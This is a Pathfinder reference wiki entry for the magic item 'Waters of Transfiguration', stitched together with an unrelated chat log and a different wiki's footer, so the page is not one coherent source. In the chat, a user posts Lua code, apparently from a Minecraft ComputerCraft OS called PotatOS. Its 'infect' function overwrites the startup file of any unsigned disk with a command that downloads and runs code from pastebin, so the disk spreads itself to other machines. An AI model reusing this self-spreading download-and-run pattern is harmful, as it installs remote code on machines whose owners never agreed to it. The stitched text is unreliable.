PFSRD:Waters Of Transfiguration

Price 12,500 gp; Aura moderate transmutation; CL 9th; Weight 1 lb.

This material is published under the OGL

This small lacquered box made from exotic and colorful woods contains five vials and a single dropper. The vials are labeled "glass," "iron," "paper," "stone," and "wood," and each contains a magical fluid that permanently transforms solid objects it touches into that material. Administering the fluid requires the included dropper, is a standard action, and provokes an attack of opportunity (similar to drinking a potion, and the attacker can strike at the dropper instead of the bearer). For example, using the vial marked "paper" on a lock transforms the lock into paper, with all of the various properties of paper (hardness, hit points, flammability, and so on). If the target object has a volume of one cubic foot or less, the transformation occurs instantly. Larger objects slowly transform at a rate of 1 hour per cubic foot of material (maximum 10 cubic feet affected). Each vial contains 5 applications of that particular fluid. Magical and attended objects may resist this transformation with a successful DC 17 Fortitude save.

Construction Requirements

Cost 6,250 gp

Craft Wondrous Item, fabricate


Back to Main Page Pathfinder Open Game Content PFSRD Magic Items

Open Game Content (place problems on the discussion page).
This is part of the Pathfinder Reference Document. It is covered by the Open Game License v1.0a, rather than the GNU Free Documentation License 1.3. To distinguish it, these items will have this notice. If you see any page that contains PFSRD material and does not show this license statement, please contact an admin so that this license statement can be added. It is our intent to work within this license in good faith.
gollark: Um, no, that's not how it works.
gollark: Quick summary:- valid disks contain a signature file and a startup- the signature can be in the old table format or hexadecimal- only disks where the signature is valid for the code on them are executed
gollark: The relevant code:```lualocal function infect(disk_side) local mp = disk.getMountPath(disk_side) if not mp then return end local ds = fs.combine(mp, "startup") -- Find paths to startup and signature files local disk_ID = disk.getID(disk_side) local sig_file = fs.combine(mp, "signature") -- shell.run disks marked with the Brand of PotatOS -- except not actually, it's cool and uses load now if fs.exists(ds) and fs.exists(sig_file) then local code = fread(ds) local sig_raw = fread(sig_file) local sig if sig_raw:find "{" then sig = textutils.unserialise(sig_raw) else sig = unhexize(sig_raw) end disk.eject(disk_side) if verify(code, sig) then -- run code, but safely (via pcall) -- print output for debugging print "Signature Valid; PotatOS Disk Loading" local out, err = load(code, "@disk/startup", nil, external_env) if not out then printError(err) else local ok, res = pcall(out, { side = disk_side, mount_path = mp, ID = disk_ID }) if ok then print(textutils.serialise(res)) else printError(res) end end else printError "Invalid Signature!" printError "Initiating Procedure 5." end -- if they're not PotatOS'd, write it on else fwrite(ds, "shell.run 'pastebin run RM13UGFa update' -- PotatOS") endend```
gollark: <@151391317740486657> What key exactly?
gollark: <@151391317740486657> Only digitally signed ones are run unsandboxed. You cannot sign a disk without the private key or probably utterly impractical hackery.
This article is issued from Dandwiki. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.